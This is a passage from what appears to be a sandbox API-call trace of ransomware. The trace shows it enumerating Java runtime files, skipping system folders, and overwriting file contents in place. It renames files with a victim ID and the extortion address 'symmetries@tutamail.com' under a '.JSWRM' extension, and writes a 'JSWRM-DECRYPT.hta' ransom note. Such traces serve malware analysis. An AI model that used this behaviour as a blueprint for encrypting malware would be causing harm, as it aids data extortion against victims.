cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.jar", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="resources.jar", lpUsedDefaultChar=0x0) returned 13 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0071.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0071.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0071.136] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.136] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3492573) returned 1 [0071.136] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0071.136] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0071.206] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.206] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0071.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.207] CloseHandle (hObject=0x454) returned 1 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0071.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0071.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0071.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0071.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.207] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0071.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0071.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0071.208] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa90a30aa, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa90a30aa, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa7233eb, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x340865b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="rt.jar", cAlternateFileName="")) returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2=".") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="..") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="...") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="windows") returned -1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="recovery") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="perflogs") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="documents and settings") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="$RECYCLE.BIN") returned 1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="system volume information") returned -1 [0071.208] lstrcmpiW (lpString1="rt.jar", lpString2="msocache") returned 1 [0071.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rt.jar", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0071.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rt.jar", cchWideChar=6, lpMultiByteStr=0x345ef40, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rt.jar", lpUsedDefaultChar=0x0) returned 6 [0071.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rt.jar", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0071.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rt.jar", cchWideChar=6, lpMultiByteStr=0x345ef10, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rt.jar", lpUsedDefaultChar=0x0) returned 6 [0071.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0071.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0071.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0071.209] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.209] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=54560347) returned 1 [0071.210] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0071.210] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0071.323] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.323] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0071.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.324] CloseHandle (hObject=0x454) returned 1 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0071.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0071.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0071.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0071.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0071.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.325] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0071.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0071.325] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1418338, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="security", cAlternateFileName="")) returned 1 [0071.325] lstrcmpiW (lpString1="security", lpString2=".") returned 1 [0071.325] lstrcmpiW (lpString1="security", lpString2="..") returned 1 [0071.325] lstrcmpiW (lpString1="security", lpString2="...") returned 1 [0071.325] lstrcmpiW (lpString1="security", lpString2="windows") returned -1 [0071.325] lstrcmpiW (lpString1="security", lpString2="recovery") returned 1 [0071.325] lstrcmpiW (lpString1="security", lpString2="perflogs") returned 1 [0071.325] lstrcmpiW (lpString1="security", lpString2="documents and settings") returned 1 [0071.326] lstrcmpiW (lpString1="security", lpString2="$RECYCLE.BIN") returned 1 [0071.326] lstrcmpiW (lpString1="security", lpString2="system volume information") returned -1 [0071.326] lstrcmpiW (lpString1="security", lpString2="msocache") returned 1 [0071.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0071.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0071.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0071.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0071.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0071.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0071.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0071.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0071.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\jswrm-decrypt.hta")) returned 0xffffffff [0071.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0071.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0071.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0071.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0071.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0071.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0071.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0071.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0071.330] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.331] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.331] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0071.332] CloseHandle (hObject=0x454) returned 1 [0071.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0071.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0071.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0071.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0071.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0071.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0071.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0071.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0071.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\jswrm-decrypt.hta")) returned 0x20 [0071.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0071.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0071.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0071.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1418338, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x212e4da1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232000 [0071.333] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.333] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1418338, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x212e4da1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0071.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.334] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.334] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfd6, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="blacklist", cAlternateFileName="BLACKL~1")) returned 1 [0071.334] lstrcmpiW (lpString1="blacklist", lpString2=".") returned 1 [0071.334] lstrcmpiW (lpString1="blacklist", lpString2="..") returned 1 [0071.334] lstrcmpiW (lpString1="blacklist", lpString2="...") returned 1 [0071.334] lstrcmpiW (lpString1="blacklist", lpString2="windows") returned -1 [0071.334] lstrcmpiW (lpString1="blacklist", lpString2="recovery") returned -1 [0071.334] lstrcmpiW (lpString1="blacklist", lpString2="perflogs") returned -1 [0071.335] lstrcmpiW (lpString1="blacklist", lpString2="documents and settings") returned -1 [0071.335] lstrcmpiW (lpString1="blacklist", lpString2="$RECYCLE.BIN") returned 1 [0071.335] lstrcmpiW (lpString1="blacklist", lpString2="system volume information") returned -1 [0071.335] lstrcmpiW (lpString1="blacklist", lpString2="msocache") returned -1 [0071.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0071.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklist", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0071.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklist", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="blacklist", lpUsedDefaultChar=0x0) returned 9 [0071.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0071.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0071.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklist", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0071.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklist", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="blacklist", lpUsedDefaultChar=0x0) returned 9 [0071.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0071.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0071.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0071.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0071.335] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.335] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4054) returned 1 [0071.335] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfd0) returned 0x24e1e0 [0071.335] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xfd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xfd0, lpOverlapped=0x0) returned 1 [0071.337] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.337] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xfd0, lpOverlapped=0x0) returned 1 [0071.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0071.337] CloseHandle (hObject=0x458) returned 1 [0071.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 